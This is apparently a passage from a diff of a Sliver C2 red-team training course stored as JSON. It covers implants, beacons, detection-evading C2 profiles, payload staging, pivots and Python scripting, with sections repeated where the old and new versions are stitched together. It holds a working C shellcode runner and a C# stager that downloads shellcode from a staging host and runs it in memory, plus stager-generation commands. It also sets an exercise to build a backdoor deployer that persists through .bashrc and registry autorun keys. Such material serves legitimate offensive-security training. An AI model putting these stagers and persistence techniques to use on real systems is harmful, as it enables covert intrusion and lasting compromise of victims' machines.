8}\n```\n\nAt this point we can generate a new implant using our new profile.\n\n```asciinema\n{\"src\": \"/asciinema/implant_custom_c2profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nIf we review the debug logs of our implant we can see that the connections now use our new profile.\n\n```asciinema\n{\"src\": \"/asciinema/implant_debug_logs.cast\", \"cols\": \"132\", \"rows\": \"28\", \"idleTimeLimit\": 8}\n```\n\nIdeally during engagements your recon phase should inform your C2 infrastructure, reusing similar hosting providers, technologies and communication protocols can help your implant fly under the radar. \n\n"},{"name":"4 - HTTP Payload staging","content":"# Stagers\n\nWhen using Sliver during a live engagement, you’re going to need to use custom stagers, which are essentially a first binary or commandline that will retrieve and/or load Sliver into memory on your target system. Sliver can generate shellcode for your stager to execute by using the `profiles` command.\n\nFor this exercise we will create a new beacon profile for linux, stage it and use a bash script to download and execute \n\n```\n[server] sliver > profiles new -b **%%LINUX_IPADDRESS%%** --format shellcode --skip-symbols --debug profile1\n\n[*] Saved new implant profile profile1\n```\n\nThe profile should now be available when listing them using `profiles` command.\n\n```\n[server] sliver > profiles\n\n Profile Name Implant Type Platform Command & Control Debug Format Obfuscation Limitations \n============== ============== =============== ======================= ======= ============ ============= =============\n profile1 session windows/amd64 [1] https://10.0.0.4 true EXECUTABLE disabled\n```\n\nA stage listener linked to the profile can now be created that will host your executable.\n\n```\n[server] sliver > stage-listener --url http://**%%LINUX_IPADDRESS%%**:7200 --profile profile1\n\n[*] No builds found for profile profile1, generating a new one\n[*] Job 1 (http) started\n```\n\nOnce thats done the stage listener will host the second stage payload on the URL when specifying a file with extension `.woff` . For example, by reaching out to: [http://localhost:7200/test.woff](http://localhost:7200/test.woff) you will see that it downloads the second stage payload.\n\n## Metasploit\n\nYou can generate msfvenom shellcode to connect back to our stage listener and retrieve the second stage payload, however you’ll need to include the `--prepend-size` argument to the stage listener as Metasploit payloads require the length to be prepended to the stage. You can either kill the previous stage listener using the `jobs -k` command or run the stage listener on a different port:\n\n```html\n[server] sliver > stage-listener --url http://**%%LINUX_IPADDRESS%%**:7202 --profile profile1 --prepend-size\n\n[*] Sliver name for profile: IDEAL_THRONE\n[*] Job 2 (http) started\n```\n\nOnce you have the stage listener setup with prepend size, you can generate the stager shellcode:\n\n```bash\n[server] sliver > generate stager --lhost **%%LINUX_IPADDRESS%%** --lport 7202 --protocol http --save /tmp --format c\n\n[*] Sliver implant stager saved to: /tmp/HOLLOW_CHINO\n```\n\nCreate a new file on the Linux box with the following contents and replace the `%%STAGE_SHELLCODE%%` field with the shellcode previously created:\n\n```bash\n#include \"windows.h\"\n\nint main()\n{\n unsigned char buf[] = **%%STAGE_SHELLCODE%%** ;\n void *exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n memcpy(exec, buf, sizeof buf);\n ((void(*)())exec)();\n\n return 0;\n}\n```\n\nFinally compile the payload.\n\n```bash\nx86_64-w64-mingw32-gcc -o stage.exe stager.c\n```\n\nOnce the executable is copied over to a windows host and run you should see a session connect back to your host.\n\n## Custom stager\n\nYou can also use a custom stager that just retrieves sliver shellcode directly and loads it in memory similarly to the previous stager.\n\n```bash\nusing System;\nusing System.Net.Http;\nusing System.Runtime.InteropServices;\nusing System.Threading.Tasks;\n\nnamespace ConsoleApp1\n{\n internal class Program\n {\n [DllImport(\"kernel32.dll\")]\n public static extern IntPtr VirtualAlloc(\n IntPtr lpAddress,\n uint dwSize,\n AllocationType flAllocationType,\n MemoryProtection flProtect);\n\n [DllImport(\"kernel32.dll\")]\n public static extern IntPtr CreateThread(\n IntPtr lpThreadAttributes,\n uint dwStackSize,\n IntPtr lpStartAddress,\n IntPtr lpParameter,\n uint dwCreationFlags,\n out IntPtr lpThreadId);\n\n [DllImport(\"kernel32.dll\")]\n public static extern bool VirtualProtect(\n IntPtr lpAddress,\n uint dwSize,\n MemoryProtection flNewProtect,\n out MemoryProtection lpflOldProtect);\n\n [DllImport(\"kernel32.dll\")]\n public static extern uint WaitForSingleObject(\n IntPtr hHandle,\n uint dwMilliseconds);\n\n [Flags]\n public enum AllocationType\n {\n Commit = 0x1000,\n Reserve = 0x2000,\n Decommit = 0x4000,\n Release = 0x8000,\n Reset = 0x80000,\n Physical = 0x400000,\n TopDown = 0x100000,\n WriteWatch = 0x200000,\n LargePages = 0x20000000\n }\n\n [Flags]\n public enum MemoryProtection\n {\n Execute = 0x10,\n ExecuteRead = 0x20,\n ExecuteReadWrite = 0x40,\n ExecuteWriteCopy = 0x80,\n NoAccess = 0x01,\n ReadOnly = 0x02,\n ReadWrite = 0x04,\n WriteCopy = 0x08,\n GuardModifierflag = 0x100,\n NoCacheModifierflag = 0x200,\n WriteCombineModifierflag = 0x400\n }\n\n static async Task Main(string[] args)\n {\n\n byte[] shellcode;\n\n using (var handler = new HttpClientHandler())\n {\n // ignore ssl, because self-signed\n handler.ServerCertificateCustomValidationCallback = (message, cert, chain, sslPolicyErrors) => true;\n\n using (var client = new HttpClient(handler))\n {\n // Download the shellcode\n shellcode = await client.GetByteArrayAsync(\"http://10.0.0.4:7200/whatever.woff\");\n }\n }\n\n // Allocate a region of memory in this process as RW\n var baseAddress = VirtualAlloc(\n IntPtr.Zero,\n (uint)shellcode.Length,\n AllocationType.Commit | AllocationType.Reserve,\n MemoryProtection.ReadWrite);\n\n // Copy the shellcode into the memory region\n Marshal.Copy(shellcode, 0, baseAddress, shellcode.Length);\n\n // Change memory region to RX\n VirtualProtect(\n baseAddress,\n (uint)shellcode.Length,\n MemoryProtection.ExecuteRead,\n out _);\n\n // Execute shellcode\n var hThread = CreateThread(\n IntPtr.Zero,\n 0,\n baseAddress,\n IntPtr.Zero,\n 0,\n out _);\n // Wait infinitely on this thread to stop the process exiting\n WaitForSingleObject(hThread, 0xFFFFFFFF);\n }\n }\n}\n```\n\n## References\n\n- [https://github.com/BishopFox/sliver/wiki/Stagers](https://github.com/BishopFox/sliver/wiki/Stagers)\n"},{"name":"5 - Pivots","content":"# Pivots\n\nPivots allow routing implant traffic through other implants. This can be usefull in environments that don’t have any outbound access, but are reachable from other parts of the network that you have access to.\n\nSliver supports two types of pivots, tcp which can be used on all operating systems and named pipes which are windows only.\n\nIn both cases the workflow is relatively similar, as a first step select a session and setup a pivot listener.\n\n```bash\n[server] sliver (INNER_GO-KART) > pivots tcp\n\n[*] Started tcp pivot listener :9898 with id 1\n\n[server] sliver (INNER_GO-KART) > pivots\n\n ID Protocol Bind Address Number Of Pivots\n==== ========== ============== ==================\n 1 TCP :9898 0\n```\n\nThe listening port and interface can be configured during creation.\n\nThe next step is to generate a payload that will connect to our listener.\n\n```bash\n[server] sliver (INNER_GO-KART) > generate --tcp-pivot 127.0.0.1 --os macos\n\n[*] Generating new darwin/amd64 implant binary\n[*] Symbol obfuscation is enabled\n[*] Build completed in 12s\n[*] Implant saved to /Users/tester/tools/VALUABLE_SICK\n```\n\nExecuting this payload will cause it to connect back through our original implant and then back to our C2 server.\n"},{"name":"6 - Scripting","content":"## Sliver Reactions\n\nReactions are a basic way to automate tasks in the sliver console, they allow you to specify sliver commands to run on a list of events.\n\n```bash\nReactable Events:\n session-connected Triggered when a new session is opened to a target\n session-updated Triggered on changes to session metadata\nsession-disconnected Triggered when a session is closed (for any reason)\n canary Triggered when a canary is burned or created\n watchtower Triggered when implants are discovered on threat intel platforms\n loot-added Triggered when a new piece of loot is added to the server\n loot-removed Triggered when a piece of loot is removed from the server\n```\n\nLet’s go ahead and create a reaction to list the current directory and environment variables when a new session checks in.\n\n```bash\nreaction set -e \"session-connected\"\n\n[*] Setting reaction to: Session Opened\n\n? Enter commands: [Enter 2 empty lines to finish]pwd\nenv\n? Enter commands:\npwd\nenv\n\n[*] Set reaction to session-connected (id: 1)\n```\n\nThe reaction is now set, if you spin up a new session these commands will be automatically run on that session’s initial connection.\n\n```bash\n[*] Session 99c7a639 UNEXPECTED_PORTER - 127.0.0.1:59966 (test.local) - darwin/amd64 - Thu, 04 May 2023 09:04:58 CEST\n\n[*] Execute reaction: 'pwd'\n\n[*] /Users/tester\n\n[*] Execute reaction: 'env'\n\nPWD=/Users/tester\nCOLORTERM=truecolor\n...\n```\n\nYou can remove reactions using `reaction unset`.\n\nHowever, there are a couple of limitations to keep in mind when using reactions, first off these are run in the console you are currently using, which is not necessarily the server console. So if you are connected to a sliver server using the sliver client, if you disconnect the client the reactions are no longer running. \n\nSecondly reactions are a relatively basic mechanism, you can’t use any conditional statements or more complex background tasks with them. For more complex use-cases you can instead write your own client in Python or Typescript to connect to the server over gRPC, which we’ll cover in the next session.\n\n## Sliver-py\n\nFor the purposes of this tutorial we’ll write our extensions using Python3, however the same result is achievable using Typescript, Golang or any other language that can handle gRPC.\n\nFirst, install the sliver-py extension using pip.\n\n```bash\npip3 install sliver-py\n```\n\nSince our extension is essentially going to be another client connection to the sliver server, you’ll also need to enable multiplayer mode and generate a new profile\n\n```bash\n[server] sliver > multiplayer\n\n[*] Multiplayer mode enabled!\n\n[server] sliver > new-operator -n tester -l 127.0.0.1\n\n[*] Generating new client certificate, please wait ...\n[*] Saved new client config to: /Users/tester/tools/tester_127.0.0.1.cfg\n```\n\nWe now have everything we need to start writing our scripts, let’s run our first example interactively in a Python shell. In this session we recommend using `ipython3` , you can install this by using pip:\n\n```html\npip3 install ipython3\n```\n\nWe first need to import a few dependencies, `SliverClientConfig` which is used to parse the client config we’ve just created and `SliverClient` which will handle the connection to the backend server.\n\n```bash\ntester@test ~/t/sliver> ipython3\nPython 3.9.16 (main, Dec 7 2022, 10:06:04)\nType 'copyright', 'credits' or 'license' for more information\nIPython 8.0.1 -- An enhanced Interactive Python. Type '?' for help.\n\nIn [1]: from sliver import SliverClientConfig, SliverClient\n\nIn [2]: DEFAULT_CONFIG = \"/Users/tester/tools/tester_127.0.0.1.cfg\"\n\nIn [3]: config = SliverClientConfig.parse_config_file(DEFAULT_CONFIG)\n\nIn [4]: client = SliverClient(config)\n\nIn [5]: await client.connect()\nOut[5]:\nMajor: 1\nMinor: 5\nPatch: 37\nCommit: \"0a43dc688ffb31a0a38511c47e8547a44a6918d4\"\nCompiledAt: 1681408237\nOS: \"darwin\"\nArch: \"arm64\"\n```\n\nFrom this point on we can use the client object to interact with the server, let’s start with listing any sessions or beacons that might be currently connected.\n\n```bash\nIn [6]: beacons = await client.beacons()\n\nIn [7]: sessions = await client.sessions()\n\nIn [8]: beacons\nOut[8]: []\n\nIn [9]: sessions\nOut[9]:\n[ID: \"f80ec897-0870-4f03-a1b1-364e5a0d243c\"\n Name: \"UNEXPECTED_PORTER\"\n Hostname: \"test.local\"\n UUID: \"c6de1a44-016a-5fbe-b76a-da56af41316d\"\n Username: \"tester\"\n UID: \"501\"\n GID: \"20\"\n OS: \"darwin\"\n Arch: \"amd64\"\n Transport: \"http(s)\"\n RemoteAddress: \"127.0.0.1:60218\"\n PID: 74773\n Filename: \"/Users/tester/tools/UNEXPECTED_PORTER\"\n LastCheckin: 1683185925\n ActiveC2: \"http://127.0.0.1\"\n ReconnectInterval: 60000000000\n PeerID: 4416183373589698218\n FirstContact: 1683185429]\n```\n\nTo run commands on this session you’ll need to create an InteractiveSession object.\n\n```bash\nIn [10]: interract = await client.interact_session(\"f80ec897-0870-4f03-a1b1-364e5a0d243c\")\n\nIn [11]: await interract.pwd()\nOut[11]: Path: \"/Users/tester\"\n```\n\nNow that we’ve got the basics of connecting to sliver and running commands down let’s write a more useful script that will display the hosts file when a new session checks in. Our goal is to first identify the Operating System, and then based on that retrieve and display the contents of the hosts file if it exists. Because this script will wait and react to events emitted by the Sliver server, we’re going to use `asyncio` to write our client.\n\n```bash\n#!/usr/bin/env python3\n\nimport os\nimport asyncio\nfrom sliver import SliverClientConfig, SliverClient\nimport gzip\n\nDEFAULT_CONFIG = \"/Users/tester/tools/neo_127.0.0.1.cfg\"\n\nasync def main():\n ''' Client connect example '''\n config = SliverClientConfig.parse_config_file(DEFAULT_CONFIG)\n client = SliverClient(config)\n await client.connect()\n\n\t\tasync for event in client.on('session-connected'):\n print('Session %s just connected !' % event.Session.ID)\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n```\n\nAs shown above we can access the session object through `event.Session`. Let’s go ahead and add a few conditions based on the operating system.\n\n```bash\nif event.Session.OS == \"darwin\":\n print('Session is running on macOS')\n\nelif event.Session.OS == \"Linux\":\n print('Session is running on Linux')\nelif event.Session.OS == \"Windows\"\n print('Session is running on Windows')\nelse:\n print('Session is running on %s', event.Session.OS)\n```\n\nLet’s setup an InteractiveSession object like previously.\n\n```bash\ninteract = await client.interact_session(event.Session.ID)\n```\n\nWe’re going to start with writing the code for Linux and Macos, since in their case the file is located in the same place. First we check if the file exists, then we download and decompress it to display its contents using gzip.\n\n```bash\nfile_listing = await interact.ls(\"/etc/hosts\")\nif file_listing.Exists:\n\tgzipFile = await interact.download(\"/etc/hosts\")\n contents = gzip.decompress(gzipFile.Data)\n print('%r' % contents)\n```\n\nThe code for Windows is relatively similar the only major difference being the file location.\n\n```bash\nfile_listing = await interact.ls(\"C:/Windows/System32/drivers/etc/hosts\")\nif file_listing.Exists:\n\tgzipFile = await interact.download(\"C:/Windows/System32/drivers/etc/hosts\")\n contents = gzip.decompress(gzipFile.Data)\n print('%r' % contents)\n```\n\nIf we run our script and spin up a few sessions we should start to see hosts files being retrieved.\n\n```bash\npython3.11 autocat.py\nAutomatically interacting with session 16338c85-b670-44ab-ac83-2df885654b07\nb\"# Copyright (c) 1993-2009 Microsoft Corp.\\r\\n#\\r\\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\\r\\n#\\r\\n# ...\n\nAutomatically interacting with session 93fcbab2-f00d-44a4-944a-e1ea8ec324e2\nb'##\\n# Host Database\\n#\\n# localhost is used to configure the loopback interface\\n# when the system is booting. Do not change this entry.\\n##\\n127.0.0.1...\n```\n\nAs an exercise, build automated backdoor deployer which first identifies the target operating system and then deploys a corresponding backdoor, in the case of Linux or Macos you can backdoor a `.bashrc` file to run a previously uploaded binary in the background, in the case of Windows you can use the registry commands to deploy a new `autorun` key.\n\nHere are a couple hints:\n\n- Start with generating sliver implants for all your target systems, on implant connection you’ll want to upload them somewhere on disc\n- In the cases of Linux and Macos you’ll want to download the `.bashrc` file, decompress and modify it locally before re-uploading it. The upload command should look like this `await interract.upload(\"/home/target/.bashrc\", contents + b'\\r\\necho \"pwned !\"')`.\n- For Windows you can look at the `registry_read` and `registry_create_key` functions.\n\n## References\n\n- [https://github.com/BishopFox/sliver/wiki/Writing-your-own-client](https://github.com/BishopFox/sliver/wiki/Writing-your-own-client)\n- [https://sliverpy.readthedocs.io/en/latest/](https://sliverpy.readthedocs.io/en/latest/)\n- [https://github.com/moloch--/sliver-py](https://github.com/moloch--/sliver-py)\n- [https://github.com/moloch--/sliver-script](https://github.com/moloch--/sliver-script)\n"},{"name":"7 - Assemblies and Bofs","content":""}]} \ No newline at end of file +{"tutorials":[{"name":"1 - Getting Started","content":"This course will use the latest Sliver build, you can download it from [insert local web server].\n\n`sliver-server` is the binary you want to use to run the Sliver C2 server, `sliver-client` is solely a client to connect to a Sliver C2 server. Sliver server also acts as a client on its own, so you don’t necessarily run sliver server and client separately.\n\nFirst time running Sliver will take a couple seconds as its retrieving its dependencies, consecutive executions will be much faster. Go ahead and launch the `sliver-server`.\n\n```asciinema\n{\"src\": \"/asciinema/startup.cast\", \"cols\": \"132\", \"rows\": \"28\", \"idleTimeLimit\": 8}\n```\n\nLet's take a couple minutes to discuss what Sliver actually is and how its setup.\n\n![Alt text](/images/Architecture.png)\n\nNow that Sliver is running, lets generate and execute your first implant to try out some of the basic features of Sliver, for now we’re going to run everything on the local host.\n\nHere's what we're going to do: \n* Generate your implant using the `generate` command as shown below.\n* Start HTTP listener on port 80\n* Execute implant in a separate terminal\n\n```asciinema\n{\"src\": \"/asciinema/first-implant.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nNow let’s select our implant and run our first command using the `use` command.\n\n```bash\n[server] sliver > use\n? Select a session or beacon: \nSESSION 1884a365 RELATED_EARDRUM [::1]:49153 test.local tester darwin/amd64\n[*] Active session RELATED_EARDRUM (1884a365-085f-4506-b28e-80c481730fd0)\n\n[server] sliver (RELATED_EARDRUM) > pwd\n\n[*] /Users/tester/tools\n```\n\nOnce you have reached this point, go ahead and explore some of the commands listed below. In each case first checkout the commands help using the **`-h`** flag then try it out!\n\n```bash\nExploring and interacting with the filesystem\n\nFilesystem\n cat Dump file to stdout\n cd Change directory\n cp Copy a file\n download Download a file\n grep Search for strings that match a regex within a file or directory\n head Grab the first number of bytes or lines from a file\n ls List current directory\n memfiles List current memfiles\n mkdir Make a directory\n mount Get information on mounted filesystems\n mv Move or rename a file\n pwd Print working directory\n rm Remove a file or directory\n tail Grab the last number of bytes or lines from a file\n upload Upload a file\n```\n\n```asciinema\n{\"src\": \"/asciinema/filesystem.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nGetting some environmental information\n```bash\nInfo\n env List environment variables\n getgid Get session process GID\n getpid Get session pid\n getuid Get session process UID\n info Get session info\n ping Send round trip message to implant (does not use ICMP)\n screenshot Take a screenshot\n whoami Get session user execution context\n```\nExecute a binary\n\n```asciinema\n{\"src\": \"/asciinema/execute.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nRunning an interactive shell\n\n```asciinema\n{\"src\": \"/asciinema/shell.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```"},{"name":"2 - Beacons vs Sessions","content":"# Beacons vs Sessions\n\nSliver implants support two types of connections, sessions and beacons.\n\nSessions use long-poling connections, which means they use a single TCP connection which is constantly open. Beacons on the other hand call back periodically, and will sleep when not active which can help keep their presence hidden.\n\nTypically during an engagement you will want to deploy a beacon on the target system, and switch to a session while doing more active enumeration activities.\n\nLet’s start with generating and deploying a beacon using `http`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_generation.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nYou can see the beacon callback times either in the `info` command or using `beacons watch`.\n\n```bash\n[server] sliver > beacons watch\n\n ID Name Transport Username Operating System Last Check-In Next Check-In\n========== =============== =========== ================= ================== =============== ===============\n 942c647c TIRED_GIRAFFE http(s) tester darwin/amd64 52s 12s\n\n```\n\nBeacon callback times and jitter can be set either during generation or on the fly using the `reconfig` command.\n\nThe example below sets the callback time to 5s with a 1s jitter.\n\n```bash\n[server] sliver (TIRED_GIRAFFE) > reconfig -i 5s -j 1s\n\n[*] Tasked beacon TIRED_GIRAFFE (b8aa6fd8)\n\n[+] TIRED_GIRAFFE completed task b8aa6fd8\n\n[*] Reconfigured beacon\n\n[server] sliver (TIRED_GIRAFFE) > info\n\n Beacon ID: 942c647c-8409-4877-9fa2-b84a7f27ad45\n Name: TIRED_GIRAFFE\n Hostname: tester.local\n UUID: c6de1a44-016a-5fbe-b76a-da56af41316d\n Username: tester\n UID: 501\n GID: 20\n PID: 55879\n OS: darwin\n Version:\n Locale:\n Arch: amd64\n Active C2: https://127.0.0.1\n Remote Address: 127.0.0.1:51803\n Proxy URL:\n Interval: 1m0s\n Jitter: 30s\n First Contact: Wed Apr 19 01:14:21 CEST 2023 (10m30s ago)\n Last Checkin: Wed Apr 19 01:18:20 CEST 2023 (6m31s ago)\n Next Checkin: Wed Apr 19 01:19:46 CEST 2023 (5m5s ago)\n```\n\nCommands issued for beacons can be viewed using `tasks`, the task state will indicate wether the command has completed or not. The results of previously run tasks can be viewed using `tasks fetch`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_tasks.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nbeacon_tasks.cast\n\nSession can be spun up using the `interractive` command.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_interractive.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nBecause of the differences between sessions and beacons, certain commands like `upload` or `download` are slower on beacons due to the callback time. Others such as socks5 are not supported and only allowed for sessions. As a rule of thumb anything requiring higher network bandwith should be run from a session.\n\nLet’s switch to our newly created session and spin-up a `socks5` proxy.\n\n```bash\n\nsocks\n[server] sliver (TIRED_GIRAFFE) > use\n\n? Select a session or beacon: SESSION 131a60b9 TIRED_GIRAFFE 127.0.0.1:51969 tester.local tester darwin/amd64\n[*] Active session TIRED_GIRAFFE (131a60b9-db4f-4913-9064-18a17a0f09ab)\n\n[server] sliver (TIRED_GIRAFFE) > socks5 start\n\n[*] Started SOCKS5 127.0.0.1 1081\n⚠️ In-band SOCKS proxies can be a little unstable depending on protocol\n```\n\nYou can then point your browser to port 1081 to tunnel traffic through the implant to your target’s local network.\n\nTry out some of the previous commands and compare behaviour on beacons and sessions. Once you are done, you should remember to close your session using the `close` command.\n"},{"name":"3 - C2 Profiles and configuration","content":"When generating implants sliver uses a C2Profile configuration, which will be use to generate the effective network configuration of the implant. For example if configured to use /admin and /demo as callback urls, it might use one, the other or both allowing two implants using the same configuration to still seem slightly different from a network traffic perspective.\n\nC2 profile configurations can be seen using the `c2profile` command, which also allows import and export features.\n\nThe full list of possible configuration option can be found in the references section below, but for now lets instead customise the existing configuration.\n\nLets imagine we’re trying to breach a customer we've noticed uses ruby-on-rails for their applications. By default sliver will use the following extensions:\n\n- `.woff` for staging\n- `.js` for poll requests\n- `.html` for key exchanges\n- `.png` for close session\n- `.php` for session messages\n\nWe will need to update the session messages and staging with something more realistic and place all references to `woff` or `php` with something less suspicious like `css`, `rb` or `erb`.\n\nWe will also use a list of common Urls and filenames for Ruby on Rails like `https://github.com/danielmiessler/SecLists/blob/master/DiscoveryWeb-Content/ror.txt` for the `*_files` and `*_paths` variables. You could also reuse Urls discovered while enumerating your target's external perimeter in a similar way.\n\nWe will split the urls using a script like the example below, and then update the files and paths variables in our configuration file.\n\n```python\nimport json\nimport math\nimport sys\nimport random\n\n\ndef updateProfile(c2ProfileName, urls, cookieName):\n data = open(urls).readlines()\n c2Profile = open(c2ProfileName, \"r\").read()\n jsonC2Profile = json.loads(c2Profile)\n\n paths, filenames, extensions = [], [], []\n for line in data:\n line = line.strip()\n if \".\" in line:\n extensions.append(line.split(\".\")[-1])\n\n if \"/\" in line:\n segments = line.split(\"/\")\n paths.extend(segments[:-1])\n filenames.append(segments[-1].split(\".\")[0])\n\n extensions = list(set(extensions))\n if \"\" in extensions:\n extensions.remove(\"\")\n random.shuffle(extensions)\n\n filenames = list(set(filenames))\n if \"\" in filenames:\n filenames.remove(\"\")\n\n paths = list(set(paths))\n if \"\" in paths:\n paths.remove(\"\")\n\n if len(extensions) < 5:\n print(f'Got {len(extensions)} extensions, need at least 5.')\n exit(0)\n\n if len(paths) < 5:\n print(f'Got {len(paths)} paths need at least 5.')\n exit(0)\n\n if len(filenames) < 5:\n print(f'Got {len(filenames)} paths need at least 5.')\n exit(0)\n\n exts = ['poll_file_ext','stager_file_ext', 'start_session_file_ext', 'session_file_ext', 'close_file_ext' ]\n for ext in exts:\n jsonC2Profile[\"implant_config\"][ext] = extensions[0]\n extensions.pop(0)\n\n pathTypes = ['poll_paths','stager_paths', 'session_paths', 'close_paths' ]\n for x, pathType in enumerate(pathTypes):\n jsonC2Profile[\"implant_config\"][pathType] = paths[math.floor(x*(len(paths)/len(pathTypes))):math.floor((x+1)*(len(paths)/len(pathTypes)))]\n\n fileTypes = ['poll_files','stager_files', 'session_files', 'close_files']\n for x, fileType in enumerate(fileTypes):\n jsonC2Profile[\"implant_config\"][fileType] = filenames[math.floor(x*(len(filenames)/len(fileTypes))):math.floor((x+1)*(len(filenames)/len(fileTypes)))]\n\n jsonC2Profile[\"server_config\"][\"cookies\"] = [cookieName]\n c2Profile = open(c2ProfileName, \"w\")\n c2Profile.write(json.dumps(jsonC2Profile))\n print(\"C2 Profile updated !\")\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 4:\n print(\"Usage: updateProfile.py myC2Profile myurls.txt cookieName\")\n exit(0)\n\n updateProfile(sys.argv[1], sys.argv[2], sys.argv[3])\n```\nThe example below demonstrates how to change and import a profile.\n\n```asciinema\n{\"src\": \"/asciinema/custom_c2profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nAt this point we can generate a new implant using our new profile.\n\n```asciinema\n{\"src\": \"/asciinema/implant_custom_c2profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nIf we review the debug logs of our implant we can see that the connections now use our new profile.\n\n```asciinema\n{\"src\": \"/asciinema/implant_debug_logs.cast\", \"cols\": \"132\", \"rows\": \"28\", \"idleTimeLimit\": 8}\n```\n\nIdeally during engagements your recon phase should inform your C2 infrastructure, reusing similar hosting providers, technologies and communication protocols can help your implant fly under the radar. \n\n"},{"name":"4 - HTTP Payload staging","content":"# Stagers\n\nWhen using Sliver during a live engagement, you’re going to need to use custom stagers, which are essentially a first binary or commandline that will retrieve and/or load Sliver into memory on your target system. Sliver can generate shellcode for your stager to execute by using the `profiles` command.\n\nFor this exercise we will create a new beacon profile and prepare to stage it.\n\n```asciinema\n{\"src\": \"/asciinema/create_profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nIf you look at the generated implant, you'll notice the `ID` field has been populated. When downloading your payload from the staging server your URL needs to be in the form of:\n```\nhttps://sliver-ip/whatever.stager_file_ext?x=yourID\n```\n\nThere is a lot of flexibility in the form of this URL, the conditions for successfull staging are:\n* the file extension needs to match the c2 profile's stager_file_ext\n* there has to be a one character http url parameter\n* the digits found in the ID need to match an implant ID, if your implant ID is 1234, abcd1234, 12beu34 are all valid values\n\nTo exposed a payload externally you need to use the `implants stage` command and specifically select the implant to be exposed.\n\n```asciinema\n{\"src\": \"/asciinema/stage_implant.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\n\n## Metasploit\n\nYou can generate msfvenom shellcode to connect back to our stage listener and retrieve the second stage payload, however you’ll need to include the `--prepend-size` argument to the stage listener as Metasploit payloads require the length to be prepended to the stage. You can either kill the previous stage listener using the `jobs -k` command or run the stage listener on a different port:\n\n```html\n[server] sliver > stage-listener --url http://**%%LINUX_IPADDRESS%%**:7202 --profile profile1 --prepend-size\n\n[*] Sliver name for profile: IDEAL_THRONE\n[*] Job 2 (http) started\n```\n\nOnce you have the stage listener setup with prepend size, you can generate the stager shellcode:\n\n```bash\n[server] sliver > generate stager --lhost **%%LINUX_IPADDRESS%%** --lport 7202 --protocol http --save /tmp --format c\n\n[*] Sliver implant stager saved to: /tmp/HOLLOW_CHINO\n```\n\nCreate a new file on the Linux box with the following contents and replace the `%%STAGE_SHELLCODE%%` field with the shellcode previously created:\n\n```bash\n#include \"windows.h\"\n\nint main()\n{\n unsigned char buf[] = **%%STAGE_SHELLCODE%%** ;\n void *exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n memcpy(exec, buf, sizeof buf);\n ((void(*)())exec)();\n\n return 0;\n}\n```\n\nFinally compile the payload.\n\n```bash\nx86_64-w64-mingw32-gcc -o stage.exe stager.c\n```\n\nOnce the executable is copied over to a windows host and run you should see a session connect back to your host.\n\n## Custom stager\n\nYou can also use a custom stager that just retrieves sliver shellcode directly and loads it in memory similarly to the previous stager.\n\n```bash\nusing System;\nusing System.Net.Http;\nusing System.Runtime.InteropServices;\nusing System.Threading.Tasks;\n\nnamespace ConsoleApp1\n{\n internal class Program\n {\n [DllImport(\"kernel32.dll\")]\n public static extern IntPtr VirtualAlloc(\n IntPtr lpAddress,\n uint dwSize,\n AllocationType flAllocationType,\n MemoryProtection flProtect);\n\n [DllImport(\"kernel32.dll\")]\n public static extern IntPtr CreateThread(\n IntPtr lpThreadAttributes,\n uint dwStackSize,\n IntPtr lpStartAddress,\n IntPtr lpParameter,\n uint dwCreationFlags,\n out IntPtr lpThreadId);\n\n [DllImport(\"kernel32.dll\")]\n public static extern bool VirtualProtect(\n IntPtr lpAddress,\n uint dwSize,\n MemoryProtection flNewProtect,\n out MemoryProtection lpflOldProtect);\n\n [DllImport(\"kernel32.dll\")]\n public static extern uint WaitForSingleObject(\n IntPtr hHandle,\n uint dwMilliseconds);\n\n [Flags]\n public enum AllocationType\n {\n Commit = 0x1000,\n Reserve = 0x2000,\n Decommit = 0x4000,\n Release = 0x8000,\n Reset = 0x80000,\n Physical = 0x400000,\n TopDown = 0x100000,\n WriteWatch = 0x200000,\n LargePages = 0x20000000\n }\n\n [Flags]\n public enum MemoryProtection\n {\n Execute = 0x10,\n ExecuteRead = 0x20,\n ExecuteReadWrite = 0x40,\n ExecuteWriteCopy = 0x80,\n NoAccess = 0x01,\n ReadOnly = 0x02,\n ReadWrite = 0x04,\n WriteCopy = 0x08,\n GuardModifierflag = 0x100,\n NoCacheModifierflag = 0x200,\n WriteCombineModifierflag = 0x400\n }\n\n static async Task Main(string[] args)\n {\n\n byte[] shellcode;\n\n using (var handler = new HttpClientHandler())\n {\n // ignore ssl, because self-signed\n handler.ServerCertificateCustomValidationCallback = (message, cert, chain, sslPolicyErrors) => true;\n\n using (var client = new HttpClient(handler))\n {\n // Download the shellcode\n shellcode = await client.GetByteArrayAsync(\"http://10.0.0.4:7200/whatever.woff\");\n }\n }\n\n // Allocate a region of memory in this process as RW\n var baseAddress = VirtualAlloc(\n IntPtr.Zero,\n (uint)shellcode.Length,\n AllocationType.Commit | AllocationType.Reserve,\n MemoryProtection.ReadWrite);\n\n // Copy the shellcode into the memory region\n Marshal.Copy(shellcode, 0, 